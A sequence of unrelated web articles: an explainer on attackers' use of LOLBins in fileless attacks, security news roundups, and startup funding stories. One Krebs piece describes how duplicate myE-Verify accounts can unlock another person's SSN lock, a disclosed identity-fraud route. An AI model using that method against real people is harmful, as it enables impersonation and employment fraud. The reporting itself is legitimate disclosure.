How Do Attackers Use LOLBins In Fileless Attacks?

For malware authors, the idea of exploiting existing software on a user’s machine to achieve malicious purposes has a lot of attractions. For one, it means less work for them in developing custom malware. For another, it means less chance of being detected. After all, if you can hijack an existing and trusted piece of software to achieve your ends, the chances are better that you’ll go undetected. This technique, known as “Living off the Land”, has a long history, but it’s not getting old.

New “Living off the Land” binaries, or LOLBins, can appear with any software or OS update, or may have been lying around with undocumented abilities for some time: researchers at SentinelLabs just disclosed a previously unknown LOLBin, for example. In this post, we dig into what LOLBins are, why they are a concern, and most importantly how you can detect their malicious use.

What is a LOLBin?

Any executable that comes installed as part of your operating system by default that can be used to further an attack can be considered a LOLBin. In addition, executables added by users for legitimate purposes could be exploited as a LOLBin, particularly if it is part of some common or widely used 3rd party software installation.

The key to understanding what a LOLBin is revolves less around its origin and more around whether the executable is found on the system prior to the malware attack.

In such cases, that executable is likely to be treated without suspicion by both users and admins and potentially even whitelisted as benign by some security tools.

In targeted attacks, an actor may first surveil a system for LOLBins unique to the victim’s environment, but typically attackers are interested in efficiency and prefer to write malware that will make use of commonly-found executables, such as scripting engines like bash and PowerShell as well as utilities like msiexec, psxec and desktopimgdownldr, which have unexpected or little-known capabilities useful to threat actors. On macOS, osascript is a LOLBin widely exploited by attackers for executing malicious AppleScripts.

Aside from being potentially ignored by both users and security tools, LOLBins like those just mentioned can allow malicious actors to communicate with remote servers and blend in with typical network activity. Other LOLBins may help attackers to perform functions such as compile code, achieve persistence, dump processes and hijack DLLs.

How Do Attackers Use LOLBins In Fileless Attacks?

Fileless attacks have been increasing in recent years, although there is some misunderstanding about exactly what makes an attack ‘fileless’. Such attacks may still be initiated through documents (like email attachments) and they may leave behind files (like persistence agents), but what makes them fileless is that the code is executed in-memory.

The main idea behind a fileless attack is that code execution occurs in-memory rather than by spawning a process that executes compiled code from a source file.

This means that the attack cannot be detected just by scanning a system for malicious binaries or executable files. In addition, once memory has been purged (such as by a reboot) there may be little or no evidence of the attack for incident responders and threat hunters to detect.

A typical scenario for a fileless attack might begin with a phishing attempt, in which the target is socially-engineered to click on a malicious link or attachment. This may execute JavaScript or VBScript or call a LOLBin like PowerShell to download and execute malicious code in-memory.

This second-stage payload may go on to use other LOLBins like WMI (Windows Management Instrumentation) to execute code to do things like achieve persistence, open a backdoor or contact a C2 server to exfiltrate data. Fileless attacks may be combined with other threats such as ransomware and keyloggers.

What Are Some Examples of Fileless Attacks Using LOLBins?

Fileless attacks using LOLBins are quite common and have been documented on Windows, Linux and Mac platforms. Indeed, insofar as the attack can hijack native tools that either exist on all platforms or have equivalents, these kinds of attacks can be platform-agnostic. APT group Lazarus, for example, has been observed distributing MS Word documents that will execute an in-memory attack using LOLBins regardless of whether the attachment is opened on Windows or a Mac.

image of visual basic sub autorun

Among some of the more high-profile attacks that have leveraged LOLBins and a fileless attack vector were those on the DNC (Democratic National Committee) in the previous US election year and the attack on Equifax in 2017 that resulted in billion dollar losses for the company and the exposure of records belonging to nearly 150 million people.

Why Do Security Researchers Worry About LOLBins?

As we have seen, LOLBins present a problem because they are a legitimate part of the environment that can be coerced to do the threat actors‘ work for them. Of course, some LOLBins like PowerShell are well-known and can be monitored and/or locked down to prevent abuse.

However, keeping an inventory of the functionality of every legitimate executable on the system and whether it could be leveraged for malicious purposes isn’t really practical. Not only do operating systems contain a vast amount of built-in binaries that are being added to or updated with new functionality all the time, there is also a massive amount of widely-used 3rd party software in the enterprise environment whose full functionality may not be documented.

As a result, security practitioners are continually engaged in research to unearth new or undiscovered LOLBins before attackers do.

But even when discovered, there remains the problem of how to deal with the use of that legitimate tool to ensure it is being used only for its intended purpose.

How Can You Detect the Malicious Use of LOLBins?

With no recognizable file signature and ever-revolving C2 IP addresses, security teams can be engaged in a wearying game of whackamole trying to chase stealthy attacks that their current tools are not equipped to handle.

In many scenarios, it is simply not effective to block LOLBins that may be essential to the productivity of some of the teams in your organization.

The key to defeating attacks leveraging LOLBins lies in a behavioral AI engine that can detect malicious behavior based on what code does, rather than where it comes from. Rather than inspecting files to see if they contain malicious code, a behavioral AI engine looks at activity on the endpoint and distinguishes between malicious and benign activity.

Using contextual information, the agent can not only recognize that some activity is malicious, but can also distinguish the source of the malicious activity without laying the blame at the door of the native tool invoked by the malicious process.

Conclusion

Stealth is one of every threat actor’s primary objectives, and natively existing binaries, LOLBins, provide perfect camouflage for malware that wants to hide in plain sight. While it’s vital that we continue to research the capabilities in our environment, the task of detecting malicious processes on execution regardless of their source is one that readily lends itself to an automated, machine learning algorithm. If you would like to see how SentinelOne can help protect your organization against all kinds of threat actors, contact us for a free demo.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

E-Verify’s “SSN Lock” is Nothing of the Sort

One of the most-read advice columns on this site is a 2018 piece called “Plant Your Flag, Mark Your Territory,” which tried to impress upon readers the importance of creating accounts at websites like those at the Social Security Administration, the IRS and others before crooks do it for you. A key concept here is that these services only allow one account per Social Security number — which for better or worse is the de facto national identifier in the United States. But KrebsOnSecurity recently discovered that this is not the case with all federal government sites built to help you manage your identity online.

A reader who was recently the victim of unemployment insurance fraud said he was told he should create an account at the Department of Homeland Security‘s myE-Verify website, and place a lock on his Social Security number (SSN) to minimize the chances that ID thieves might abuse his identity for employment fraud in the future.

DHS’s myE-Verify homepage.

According to the website, roughly 600,000 employers at over 1.9 million hiring sites use E-Verify to confirm the employment eligibility of new employees. E-Verify’s consumer-facing portal myE-Verify lets users track and manage employment inquiries made through the E-Verify system. It also features a “Self Lock” designed to prevent the misuse of one’s SSN in E-Verify.

Enabling this lock is supposed to mean that for the next year thereafter, if an unauthorized individual attempts to fraudulently use a SSN for employment authorization, he or she cannot use the SSN in E-Verify, even if the SSN is that of an employment authorized individual. But in practice, this service may actually do little to deter ID thieves from impersonating you to a potential employer.

At the request of the reader who reached out (and in the interest of following my own advice to plant one’s flag), KrebsOnSecurity decided to sign up for a myE-Verify account. After verifying my email address, I was asked to pick a strong password and select a form of multi-factor authentication (MFA). The most secure MFA option offered (a one-time code generated by an app like Google Authenticator or Authy) was already pre-selected, so I chose that.

The site requested my name, address, SSN, date of birth and phone number. I was then asked to select five questions and answers that might be asked if I were to try to reset my password, such as “In what city/town did you meet your spouse,” and “What is the name of the company of your first paid job.” I chose long, gibberish answers that had nothing to do with the questions (yes, these password questions are next to useless for security and frequently are the cause of account takeovers, but we’ll get to that in a minute).

Password reset questions selected, the site proceeded to ask four, multiple-guess “knowledge-based authentication” questions to verify my identity. The U.S. Federal Trade Commission‘s primer page on preventing job-related ID theft says people who have placed a security freeze on their credit files with the major credit bureaus will need to lift or thaw the freeze before being able to answer these questions successfully at myE-Verify. However, I did not find that to be the case, even though my credit file has been frozen with the major bureaus for years.

After successfully answering the KBA questions (the answer to each was “none of the above,” by the way), the site declared I’d successfully created my account! I could then see that I had the option to place a “Self Lock” on my SSN within the E-Verify system.

Doing so required me to pick three more challenge questions and answers. The site didn’t explain why it was asking me to do this, but I assumed it would prompt me for the answers in the event that I later chose to unlock my SSN within E-Verify.

After selecting and answering those questions and clicking the “Lock my SSN” button, the site generated an error message saying something went wrong and it couldn’t proceed.

Alas, logging out and logging back in again showed that the site did in fact proceed and that my SSN was locked. Joy.

But I still had to know one thing: Could someone else come along pretending to be me and create another account using my SSN, date of birth and address but under a different email address? Using a different browser and Internet address, I proceeded to find out.

Imagine my surprise when I was able to create a separate account as me with just a different email address (once again, the correct answers to all of the KBA questions was “none of the above”). Upon logging in, I noticed my SSN was indeed locked within E-Verify. So I chose to unlock it.

Did the system ask any of the challenge questions it had me create previously? Nope. It just reported that my SSN was now unlocked. Logging out and logging back in to the original account I created (again under a different IP and browser) confirmed that my SSN was unlocked.

ANALYSIS

Obviously, if the E-Verify system allows multiple accounts to be created using the same name, address, phone number, SSN and date of birth, this is less than ideal and somewhat defeats the purpose of creating one for the purposes of protecting one’s identity from misuse.

Lest you think your SSN and DOB is somehow private information, you should know this static data about U.S. residents has been exposed many times over in countless data breaches, and in any case these digits are available for sale on most Americans via Dark Web sites for roughly the bitcoin equivalent of a fancy caffeinated drink at Starbucks.

Being unable to proceed through knowledge-based authentication questions without first unfreezing one’s credit file with one or all of the big three credit bureaus (Equifax, Experian and TransUnion) can actually be a plus for those of us who are paranoid about identity theft. I couldn’t find any mention on the E-Verify site of which company or service it uses to ask these questions, but the fact that the site doesn’t seem to care whether one has a freeze in place is troubling.

And when the correct answer to all of the KBA questions that do get asked is invariably “none of the above,” that somewhat lessens the value of asking them in the first place. Maybe that was just the luck of the draw in my case, but also troubling nonetheless. Either way, these KBA questions are notoriously weak security because the answers to them often are pulled from records that are public anyway, and can sometimes be deduced by studying the information available on a target’s social media profiles.

Speaking of silly questions, relying on “secret questions” or “challenge questions” as an alternative method of resetting one’s password is severely outdated and insecure. A 2015 study by Google titled “Secrets, Lies and Account Recovery” (PDF) found that secret questions generally offer a security level that is far lower than just user-chosen passwords. Also, the idea that an account protected by multi-factor authentication could be undermined by successfully guessing the answer(s) to one or more secret questions (answered truthfully and perhaps located by thieves through mining one’s social media accounts) is bothersome.

Finally, the advice given to the reader whose inquiry originally prompted me to sign up at myE-Verify doesn’t seem to have anything to do with preventing ID thieves from fraudulently claiming unemployment insurance benefits in one’s name at the state level. KrebsOnSecurity followed up with four different readers who left comments on this site about being victims of unemployment fraud recently, and none of them saw any inquiries about this in their myE-Verify accounts after creating them. Not that they should have seen signs of this activity in the E-Verify system; I just wanted to emphasize that one seems to have little to do with the other.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

The Good

Another high-profile cybercriminal has received a well-deserved sentence from a federal judge in Alexandria, VA. Aleksei Burkov, who pleaded guilty in January, was charged with conspiracy to commit computer intrusion, device fraud, identify theft, and money laundering stemming from his involvement with two well-known forums. Both forums, one of which was Cardplanet, were long-standing gathering places for cybercriminals to meet and trade stolen information.

The second forum involved was a much more guarded and heavily-vetted environment. The upper echelon would pay $5000 for the privilege of access to the forum and associated services from the participants. Burkov potentially faced 15 years of prison time after being extradited to the United States in November of 2019.

Ultimately the judge awarded him 9 years, noting that Burkov had already been incarcerated since 2015. It is estimated that the forums collectively facilitated near $20 million in credit card fraud and other identity-based crimes. It’s always good to see these cases end in a positive way (for the good guys!).

The Bad

This week, macOS security got a nasty shock in the form of a rare ransomware threat targeting the platform. Dubbed variously “EvilQuest”, “ThiefQuest” and “MacRansom.K”, this trojan displays both data stealing and encryption (ransomware) traits.

The lure and delivery of the trojan is all too familiar, unfortunately. The malware has been spreading via torrents offering pirated or “cracked” versions of a number of popular macOS applications including Ableton Live, Mixed in Key, and Little Snitch. The malware arrives as a .DMG file containing a package-based installer for the trojanized application. Upon launch, the installer requests elevated privileges, establishes both user-level and root-level persistence, and proceeds to activate additional functionality. Files do indeed get encrypted at this point; however, some additional behaviors occur adding to the list of malicious activities. “EvilQuest” appears to install a keylogger as well as a reverse shell, potentially allowing the threat actor direct and on-going access. The malware also retrieves multiple remote scripts, one of which is used specifically for file exfiltration.

The trojan will recursively seek all files under the /Users folder matching a hard-coded extension list and proceed to transmit them externally. Others have noted that there are limits to the file size that can be transferred (800k), which may prevent exfiltration of various file types (.wallet, for example). In addition, there seem to be some issues with the encryption itself, in that filetypes beyond the hard-coded extension set could end up encrypted.

Although analysis is still ongoing, this unusually complex (for macOS) malware looks like a first attempt at targeting the Apple Mac platform with malware that has the same kind of combined ransomware/wiper plus data stealing capabilities seen in malware families hitting the Windows universe of late (e.g., Ragnar, Netwalker, Snake). Expect it not to be the last.

The Ugly

In perhaps this week’s most serious security news, U.SCERT, along with many other agencies, released alerts concerning a critical vulnerability in Palo Alto Networks’ PAN-OS. The flaw, assigned CVE-2020-2021, lies in an authentication bypass in SAML Authentication. Through this vulnerability, attackers could potentially execute arbitrary code and take full control of affected devices and systems. More specifically, an unauthenticated attacker (assuming network access) could access the vulnerable resources and login to perform administrative actions such as opening up interfaces for future stages of attack or modifying permissions on existing accounts.

The problematic SAML implementation exists in code residing on multiple Palo Alto Networks products including VPN Gateways and firewalls: two big places you want to keep attackers out of. Specific software affected includes Prisma Access and GlobalProtect Gateway, among others. Palo Alto Networks posted their advisory on June 29th, which includes mitigation and workaround instructions. SAML can be temporarily disabled to prevent exploitation of the flaw, and a fix has been released in the form of updated versions of PAN-OS.

This is a critical flaw, and thankfully (this time) the vendor has provided a fix in a timely and well-communicated manner. We encourage all to review their exposure to this vulnerability and take the required steps to mitigate. Keeping all applications and services up to date and at the latest patch level, while not always straightforward, is paramount as we strive to defend our networks against current and future attacks.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

SEC filing indicates big data provider Palantir is raising $961M, $550M of it already secured

Palantir, the sometimes controversial, but always secretive, big data and analytics provider that works with governments and other public and private organizations to power national security, health and a variety of other services, has reportedly been eyeing a public listing this autumn. But in the meantime it’s also continuing to push ahead in the private markets.

The company has filed a Form D — its first in four years — indicating that it is in the process of raising nearly $1 billion — $961,099,010, to be exact — with $549,727,437 of that already sold, and a further $411,371,573 remaining to be raised.

It’s not clear if this fundraise would essentially mean a delay to a public listing, or if it would complement it. Nor is it clear whether this filing is additionally covering secondary or previously undisclosed funding that it is now getting in order ahead of a public listing. The Form D notes that 58 investors who already have invested in the offering, which might indicate that at least some of this is secondary, and that “of the total remaining to be sold, all but $671,576.25 represents shares of common stock already subscribed for.”

The filing, alternatively, could confirm a report from back in September 2019 that the company was seeking to raise between $1 billion and $3 billion, its first fundraising in four years. That report noted Palantir was targeting a $26 billion valuation, up from $20 billion four years ago. A Reuters article from June put its valuation on secondary market trades at between $10 billion and $14 billion.

The bigger story of that Reuters report was that Palantir said in June that it had closed funding from two strategic investors that both work with the company: $500 million in funding from Japanese insurance company Sompo Holdings, and $50 million from Fujitsu. Together, it seems like these might account for $550 million already sold on the Form D.

To date, Palantir has raised $3.3 billion in funding, according to PitchBook data, which names no fewer than 108 investors on its cap table.

If you dig into the PitchBook data (some of which is behind a paywall) it also seems that Palantir has raised a number of other rounds of undisclosed amounts. Confusingly (but probably apt for a company famous for being secretive) some of that might also be part of this Form D amount.

We have reached out to Palantir to ask about the Form D and will update this post as we learn more.

While Palantir was last valued at $20 billion when it raised money four years ago, there are some data points that point to a bigger valuation today.

In April, according to a Bloomberg report, the company briefed investors with documents showing that it expects to make $1 billion in revenues this year, up 38% on 2019, and breaking even in the first time since being founded 16 years ago by Peter Thiel, Nathan Gettings, Joe Lonsdale, Stephen Cohen and current CEO Alex Karp.

(The Bloomberg report didn’t explain why Palantir was briefing investors, whether for a potential public listing, or for the fundraise we’re reporting on here, or something else.)

On top of that, the company has been in the news a lot around the global novel coronavirus pandemic. Specifically, it’s been winning business, in the form of projects in major markets like the U.K. (where it’s part of a consortium of companies working with the NHS on a COVID-19 data trove) and the U.S. (where it’s been working on a COVID-19 tracker for the federal government and a project with the CDC), and possibly others. Those projects will presumably need a lot of upfront capital to set up and run, possibly one reason it is raising money now.

QuestDB nabs $2.3M seed to build open source time series database

QuestDB, a member of the Y Combinator summer 2020 cohort, is building an open source time series database with speed top of mind. Today the startup announced a $2.3 million seed round.

Episode1 Ventures led the round with assistance from Seedcamp, 7percent Ventures, YCombinator, Kima Ventures and several unnamed angel investors.

The database was originally conceived in 2013 when current CTO Vlad Ilyushchenko was building trading systems for a financial services company and he was frustrated by the performance limitations of the databases available at the time, so he began building a database that could handle large amounts of data and process it extremely fast.

For a number of years, QuestDB was a side project, a labor of love for Ilyushchenko until he met his other co-founders Nicolas Hourcard, who became CEO and Tancrede Collard, who became CPO, and the three decided to build a startup on top of the open source project last year.

“We’re building an open source database for time series data, and time series databases are a multi-billion-dollar market because they’re central for financial services, IoT and other enterprise applications. And we basically make it easy to handle explosive amounts of data, and to reduce infrastructure costs massively,” Hourcard told TechCrunch.

He adds that it’s also about high performance. “We recently released a demo that you can access from our website that enables you to query a super large datasets — 1.6 billion rows with sub-second queries, mostly, and that just illustrates how performant the software is,” he said.

He sees open source as a way to build adoption from the bottom up inside organizations, winning the hearts and minds of developers first, then moving deeper in the company when they eventually build a managed cloud version of the product. For now, being open source also helps them as a small team to have a community of contributors help build the database and add to its feature set.

“We’ve got this open source product that is free to use, and it’s pretty important for us to have such a distribution model because we can basically empower developers to solve their problems, and we can ask for contributions from various communities. […] And this is really a way to spur adoption,” Hourcard said.

He says that working with YC has allowed them to talk to other companies in the ecosystem who have built similar open source-based startups and that’s been helpful, but it has also helped them learn to set and meet goals and have access to some of the biggest names in Silicon Valley, including Marc Andreessen, who delivered a talk to the cohort the same day we spoke.

Today the company has seven employees, including the three founders, spread out across the US, EU and South America. He sees this geographic diversity helping when it comes to building a diverse team in the future. “We definitely want to have more diverse backgrounds to make sure that we keep having a diverse team and we’re very strongly committed to that.”

For the short term, the company wants to continue building its community, working on continuing to improve the open source product, while working on the managed cloud product.

Ransomware Gangs Don’t Need PR Help

We’ve seen an ugly trend recently of tech news stories and cybersecurity firms trumpeting claims of ransomware attacks on companies large and small, apparently based on little more than the say-so of the ransomware gangs themselves. Such coverage is potentially quite harmful and plays deftly into the hands of organized crime.

Often the rationale behind couching these events as newsworthy is that the attacks involve publicly traded companies or recognizable brands, and that investors and the public have a right to know. But absent any additional information from the victim company or their partners who may be affected by the attack, these kinds of stories and blog posts look a great deal like ambulance chasing and sensationalism.

Currently, more than a dozen ransomware crime gangs have erected their own blogs to publish sensitive data from victims. A few of these blogs routinely issue self-serving press releases, some of which gallingly refer to victims as “clients” and cast themselves in a beneficent light. Usually, the blog posts that appear on ransom sites are little more than a teaser — screenshots of claimed access to computers, or a handful of documents that expose proprietary or financial information.

The goal behind the publication of these teasers is clear, and the ransomware gangs make no bones about it: To publicly pressure the victim company into paying up. Those that refuse to be extorted are told to expect that huge amounts of sensitive company data will be published online or sold on the dark web (or both).

Emboldened by their successes, several ransomware gangs recently have started demanding two ransoms: One payment to secure a digital key that can unlock files, folders and directories encrypted by their malware, and a second to avoid having any stolen information published or shared with others.

KrebsOnSecurity has sought to highlight ransomware incidents at companies whose core business involves providing technical services to others — particularly managed service providers that have done an exceptionally poor job communicating about the attack with their customers.

Overall, I’ve tried to use each story to call attention to key failures that frequently give rise to ransomware infections, and to offer information about how other companies can avoid a similar fate.

But simply parroting what professional extortionists have posted on their blog about victims of cybercrime smacks of providing aid and comfort to an enemy that needs and deserves neither.

Maybe you disagree, dear readers? Feel free to sound off in the comments below.

Apple device management company Jamf files S-1 as it prepares to go public

Jamf, the Apple device management company, filed to go public today. Jamf might not be a household name, but the Minnesota company has been around since 2002 helping companies manage their Apple equipment.

In the early days, that was Apple computers. Later it expanded to also manage iPhones and iPads. The company launched at a time when most IT pros had few choices for managing Macs in a business setting.

Jamf changed that, and as Macs and other Apple devices grew in popularity inside organizations in the 2010s, the company’s offerings grew in demand. Notably, over the years Apple has helped Jamf and its rivals considerably, by building more sophisticated tooling at the operating system level to help manage Macs and other Apple devices inside organizations.

Jamf raised approximately $50 million of disclosed funding before being acquired by Vista Equity Partners in 2017 for $733.8 million, according to the S-1 filing. Today, the company kicks off the high-profile portion of its journey toward going public.

Apple device management takes center stage

In a case of interesting timing, Jamf is filing to go public less than a week after Apple bought mobile device management startup Fleetsmith. At the time, Apple indicated that it would continue to partner with Jamf as before, but with its own growing set of internal tooling, which could at some point begin to compete more rigorously with the market leader.

Other companies in the space managing Apple devices besides Jamf and Fleetsmith include Addigy and Kandji. Other more general offerings in the mobile device management (MDM) space include MobileIron and VMware Airwatch among others.

Vista is a private equity shop with a specific thesis around buying out SaaS and other enterprise companies, growing them, and then exiting them onto the public markets or getting them acquired by strategic buyers. Examples include Ping Identity, which the firm bought in 2016 before taking it public last year, and Marketo, which Vista bought in 2016 for $1.8 billion and sold to Adobe last year for $4.8 billion, turning a tidy profit.

Inside the machine

Now that we know where Jamf sits in the market, let’s talk about it from a purely financial perspective.

Jamf is a modern software company, meaning that it sells its digital services on a recurring basis. In the first quarter of 2020, for example, about 83% of its revenue came from subscription software. The rest was generated by services and software licenses.

Now that we know what type of company Jamf is, let’s explore its growth, profitability and cash generation. Once we understand those facets of its results, we’ll be able to understand what it might be worth and if its IPO appears to be on solid footing.

We’ll start with growth. In 2018 Jamf recorded $146.6 million in revenue, which grew to $204.0 million in 2019. That works out to an annual growth rate of 39.2%, a more than reasonable pace of growth for a company going public. It’s not super quick, mind, but it’s not slow either. More recently, the company grew 36.9% from $44.1 million in Q1 2019 to $60.4 million in revenue in Q1 2020. That’s a bit slower, but not too much slower.

Turning to profitability, we need to start with the company’s gross margins. Then we’ll talk about its net margins. And, finally, adjusted profits.

Gross margins help us understand how valuable a company’s revenue is. The higher the gross margins, the better. SaaS companies like Jamf tend to have gross margins of 70% or above. In Jamf’s own case, it posted gross margins of 75.1% in Q1 2020, and 72.5% in 2019. Jamf’s gross margins sit comfortably in the realm of SaaS results, and, perhaps even more importantly, are improving over time.

Getting behind the curtain

When all its expenses are accounted for, the picture is less rosy, and Jamf is unprofitable. The company’s net losses for 2018 and 2019 were similar, totaling $36.3 million and $32.6 million, respectively. Jamf’s net loss improved a little in Q1, falling from $9.0 million in 2019 to $8.3 million this year.

The company remains weighed down by debt, however, which cost it nearly $5 million in Q1 2020, and $21.4 million for all of 2019. According to the S-1, Jamf is sporting a debt-to-equity ratio of roughly 0.8, which may be a bit higher than your average public SaaS company, and is almost certainly a function of the company’s buyout by a private equity firm.

But the company’s adjusted profit metrics strip out debt costs, and under the heavily massaged adjusted earnings before interest, taxes, depreciation and amortization (EBITDA) metric, Jamf’s history is only one of rising profitability. From $6.6 million in 2018 to $20.8 million in 2019, and from $4.3 million in Q1 2019 to $5.6 million in Q1 2020, with close to 10% adjusted operating profit margins through YE 2019.

It will be interesting to see how the company’s margins will be affected by COVID-19, with financials during the period still left blank in this initial version of the S-1. The Enterprise market in general has been reasonably resilient to the recent economic shock, and device management may actually perform above expectations, given the growing push for remote work.

Completing the picture

Something notable about Jamf is that it has positive cash generation, even if in Q1 it tends to consume cash that is made up for in other quarters. In 2019, the firm posted $11.2 million in operational cash flow. That’s a good result, and better than 2018’s $9.4 million of operating cash generation. (The company’s investing cash flows have often run negative due to Jamf acquiring other companies, like ZuluDesk and Digita.)

With Jamf, we have a SaaS company that is growing reasonably well, has solid, improving margins, non-terrifying losses, growing adjusted profits and what looks like a reasonable cash flow perspective. But Jamf is cash poor, with just $22.7 million in cash and equivalents as of the end of Q1 2020 — some months ago now. At that time, the firm also had debts of $201.6 million.

Given the company’s worth, that debt figure is not terrifying. But the company’s thin cash balance makes it a good IPO candidate; going public will raise a chunk of change for the company, giving it more operating latitude and also possibly a chance to lower its debt load. Indeed Jamf notes that it intends to use part of its IPO raise to “to repay outstanding borrowings under our term loan facility…” Paying back debt at IPO is common in private equity buyouts.

So what?

Jamf’s march to the public markets adds its name to a growing list of companies. The market is already preparing to ingest Lemonade and Accolade this week, and there are rumors of more SaaS companies in the wings, just waiting to go public.

There’s a reasonable chance that as COVID-19 continues to run roughshod over the United States, the public markets eventually lose some momentum. But that isn’t stopping companies like Jamf from rolling the dice and taking a chance going public.

Fauna raises an additional $27M to turn databases into a simple API call

Databases have always been a complex part of the equation for developers requiring a delicate balance to manage inside the application, but Fauna wants to make adding a database a simple API call, and today it announced $27 million in new funding.

The round, which is technically an extension of the company’s 2017 Series A, was led by Madrona Venture Group with participation from Addition, GV, CRV, Quest Ventures and a number of individual investors. Today’s investment brings the total raised to $57 million, according to the company.

While it was at it, the company also added some executive fire power, announcing that it was bringing on former Okta chief product officer Eric Berg as CEO and former Snowflake CEO Bob Muglia as Chairman.

Companies like Stripe for payments and Twilio for communications are the poster children for the move to APIs. Instead of building sophisticated functionality from scratch, a developer can use an API call to a service, and presto, has the tooling built in without any fuss. Fauna does the same thing for databases.

“Within a few lines of code with Fauna, developers can add a full-featured globally distributed database to their applications. They can simplify code, reduce costs and ship faster because they never again worry about database issues such as correctness, capacity, scalability, replication, etc,” new CEO Berg told TechCrunch.

To automate the process even further, the database is serverless, meaning that it scales up or down automatically to meet the needs of the application. Company co-founder Evan Weaver, who has moved to CTO with the hiring of Berg, says that Stripe is a good example of how this works. “You don’t think about provisioning Stripe because you don’t have to. […] You sign up for an account and beyond that you don’t have to provision or operate anything,” Weaver explained.

Like most API companies, it’s working at the developer level to build community and developer consensus around it. Today, they have 25,000 developers using the tool. While they don’t have an open-source version, they try to attract developer interest with a generous free tier, after which you can pay as you go or set up a fixed monthly pricing as you scale up.

The company has always been 100% remote, so when COVID hit, it didn’t really change anything about the way the company’s 40 employees work. As the company grows, Berg says it has aggressive goals around diversity and inclusion.

“Our recruiting and HR team have some pretty aggressive targets in terms of thinking about diversity in our pipelines and in our recruiting efforts, and because we’re a small team today we have the ability to impact that as we grow. If we doubled the size of the company, we could shift those percentages pretty dramatically, so it’s something that is definitely top of mind for us.”

Weaver says that fundraising began at the beginning of this year before COVID hit, but the term sheet wasn’t signed until March. He admits being nervous throughout the process, especially as the pandemic took hold. A company like Fauna is highly technical and takes time to grow, and he worried getting investors to understand that, even without a bleak economic picture, was challenging.

“It’s a deep tech business and it takes real capital to grow and scale. It’s a high-risk, high-reward bet, which is easier to fund in boom times, but broadly I think the best companies get built during recessions when there’s less competition for talent and there’s more focus on capital.”

Vendia raises $5.1M for its multi-cloud serverless platform

When the inventor of AWS Lambda, Tim Wagner, and the former head of blockchain at AWS, Shruthi Rao, co-found a startup, it’s probably worth paying attention. Vendia, as the new venture is called, combines the best of serverless and blockchain to help build a truly multi-cloud serverless platform for better data and code sharing.

Today, the Vendia team announced that it has raised a $5.1 million seed funding round, led by Neotribe’s Swaroop ‘Kittu’ Kolluri. Correlation Ventures, WestWave Capital, HWVP, Firebolt Ventures, Floodgate and FuturePerfect Ventures also participated in this oversubscribed round.

(Image Credits: Vendia)

Seeing Wagner at the helm of a blockchain-centric startup isn’t exactly a surprise. After building Lambda at AWS, he spent some time as VP of engineering at Coinbase, where he left about a year ago to build Vendia.

“One day, Coinbase approached me and said, ‘hey, maybe we could do for the financial system what you’ve been doing over there for the cloud system,’ ” he told me. “And so I got interested in that. We had some conversations. I ended up going to Coinbase and spent a little over a year there as the VP of Engineering, helping them to set the stage for some of that platform work and tripling the size of the team.” He noted that Coinbase may be one of the few companies where distributed ledgers are actually mission-critical to their business, yet even Coinbase had a hard time scaling its Ethereum fleet, for example, and there was no cloud-based service available to help it do so.

Tim Wagner, Vendia co-founder and CEO (Image Credits: Vendia)

“The thing that came to me as I was working there was why don’t we bring these two things together? Nobody’s thinking about how would you build a distributed ledger or blockchain as if it were a cloud service, with all the things that we’ve learned over the course of the last 10 years building out the public cloud and learning how to do it at scale,” he said.

Wagner then joined forces with Rao, who spent a lot of time in her role at AWS talking to blockchain customers. One thing she noticed was that while it makes a lot of sense to use blockchain to establish trust in a public setting, that’s really not an issue for enterprise.

“After the 500th customers, it started to make sense,” she said. “These customers had made quite a bit of investment in IoT and edge devices. And they were gathering massive amounts of data. And they also made investments on the other side, with AI and ML and analytics. And they said, ‘well, there’s a lot of data and I want to push all of this data through these intelligent systems. And I need a mechanism to get this data.’ ” But the majority of that data often comes from third-party services. At the same time, most blockchain proof of concepts weren’t moving into any real production usage because the process was often far too complex, especially enterprises that maybe wanted to connect their systems to those of their partners.

Shruthi Rao, Vendia co-founder and CBO (Image Credits: Vendia)

“We are asking these partners to spin up Kubernetes clusters and install blockchain nodes. Why is that? That’s because for blockchain to bring trust into a system to ensure trust, you have to own your own data. And to own your own data, you need your own node. So we’re solving fundamentally the wrong problem,” she explained.

The first product Vendia is bringing to market is Vendia Share, a way for businesses to share data with partners (and across clouds) in real time, all without giving up control over that data. As Wagner noted, businesses often want to share large data sets but they also want to ensure they can control who has access to that data. For those users, Vendia is essentially a virtual data lake with provenance tracking and tamper-proofing built-in.

The company, which mostly raised this round after the coronavirus pandemic took hold in the U.S., is already working with a couple of design partners in multiple industries to test out its ideas, and plans to use the new funding to expand its engineering team to build out its tools.

“At Neotribe Ventures, we invest in breakthrough technologies that stretch the imagination and partner with companies that have category creation potential built upon a deep-tech platform,” said Neotribe founder and managing director Kolluri. “When we heard the Vendia story, it was a no-brainer for us. The size of the market for multi-party, multi-cloud data and code aggregation is enormous and only grows larger as companies capture every last bit of data. Vendia’s Serverless -based technology offers benefits such as ease of experimentation, no operational heavy lifting and a pay-as-you-go pricing model, making it both very consumable and highly disruptive. Given both Tim and Shruthi’s backgrounds, we know we’ve found an ideal ‘Founder fit’ to solve this problem! We are very excited to be the lead investors and be a part of their journey.”

Minneapolis-based VC shop Bread & Butter focuses on its own backyard

While many investors say sheltering in place has broadened their appetite for funding companies located outside major hubs, one firm is doubling down on backing startups in America’s heartland.

Launched in 2016 by Brett Brohl, The Syndicate Fund rebranded to Bread & Butter Ventures earlier this month (a reference to one of Minnesota’s many nicknames). Along with the rebrand, longtime Google executive and Revolution partner Mary Grove joined the team as a general partner and Stephanie Rich came aboard as head of platform.

The growth of the Twin Cities’ startup ecosystem is precisely why The Syndicate Fund rebranded. The firm, which has $10 million in assets under management, will invest in three of Minneapolis’ biggest strengths: agriculture and food, health care and enterprise software.

Agtech interest spans the entire spectrum from farming to restaurants and grocery stores. The firm is also interested in the “messy middle” of supply chain and logistics around food, said Brohl and is interested in a mix of software, hardware and biosciences. Within health care, the firm evaluates solutions focused on prevention versus treatment, female health startups working on maternal health and fertility and software focused on the aging population and millennials.

It’s also looking at enterprise software that can serve large businesses and scale efficiently.